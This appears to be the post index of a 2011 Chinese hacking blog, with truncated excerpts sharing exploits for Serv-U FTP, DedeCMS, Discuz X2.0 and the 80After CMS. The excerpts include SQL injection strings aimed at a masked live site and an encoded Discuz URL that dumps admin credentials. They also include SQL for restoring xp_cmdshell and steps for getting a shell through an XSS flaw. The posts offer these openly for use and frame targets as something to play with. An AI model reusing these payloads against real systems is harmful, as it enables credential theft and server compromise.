F4usT's BloG

Serv-U FTP Jail Break（越权遍历目录、下载任意文件）

null@null.com (admin) — Fri, 02 Dec 2011 10:23:43 +0800

[*]----------------------------------------------------[*]
Serv-U FTP Server Jail Break 0day
Discovered By Kingcope
Year 2011
[*]----------------------------------------------------[*]

/*
通过构造..:/来遍历服务器目录，下载任意文件
...

如何判段删掉，恢复 xp_cmdshell

null@null.com (admin) — Wed, 23 Nov 2011 10:55:34 +0800

一、xp_cmdshell的删除及恢复

1、判断xp_cmdshell是否存在

(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name ='xp_cmdshell')

返回结果为1就ok

2、恢复xp_cmdshell的方法

删除扩展存储过过程xp_cmdshell的语句

exec sp_dropextendedproc 'xp_cmdshell'

...

窝窝团，尼玛的，坑爹呢。

null@null.com (admin) — Thu, 29 Sep 2011 09:01:35 +0800

窝窝团，尼玛的，坑爹啊

...

80After CMS V4 鸡肋上传漏洞 - 脚本漏洞

null@null.com (admin) — Thu, 18 Aug 2011 16:20:29 +0800

By：小A

官方网址:http://www.reaft.com/

Cms下载地址:http://www.reaft.com/html/1/200.html

界面做的还不错，搜索了一下好像用的人很少，开始。

首先看目录下 UpLoad.html 文件上传，调用了的是 UpLoad.asp。

...

DEDEcms 拿shell EXP

null@null.com (admin) — Thu, 11 Aug 2011 11:45:27 +0800

漏洞细节已经传遍了（http://www.t00ls.net/thread-17354-1-1.html），又没得玩了。T00LS7 @! ~" `, T( g2 ^5 T+ d
...

栾川之行。

null@null.com (admin) — Wed, 03 Aug 2011 09:01:50 +0800

...

搜索型字符注入

null@null.com (admin) — Mon, 18 Jul 2011 15:46:42 +0800

SQL注入：http://www.*****.cn/ZW_index.aspx
搜索注入
1、基本信息
数据库版本：
2011%' and 1=(select @@version) and '%'=''
数据库连接用户：
2011%' and user>0 and '%'='

...

安全性异常 ,请求类型的权限已失败。

null@null.com (admin) — Mon, 18 Jul 2011 15:38:54 +0800

安全性异常
说明: 应用程序试图执行安全策略不允许的操作。要授予此应用程序所需的权限，请与系统管理员联系，或在配置文件中更改该应用程序的信任级别。

异常详细信息: System.Security.SecurityException: 请求“System.Security.Permissions.SecurityPermission, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089”类型的权限已失败。

...

Dz x 2.0 SqL 注射0day

null@null.com (admin) — Wed, 29 Jun 2011 14:48:21 +0800

转自互联网如果谁是首发麻烦给我说下我会加上版权联系邮箱：admin@f4le.com

DZ2.0直接暴管理账号密码
http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D

...

dedecms xss oday通杀所有版本

null@null.com (admin) — Sat, 25 Jun 2011 19:29:09 +0800

作者：haris

漏洞原因：由于编辑器过滤不严，将导致恶意脚本运行。可getshell

为什么说它是ODay呢，能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。

下面说说利用方法。
条件有2个：
1.开启注册
2.开启投稿

注册会员----发表文章
...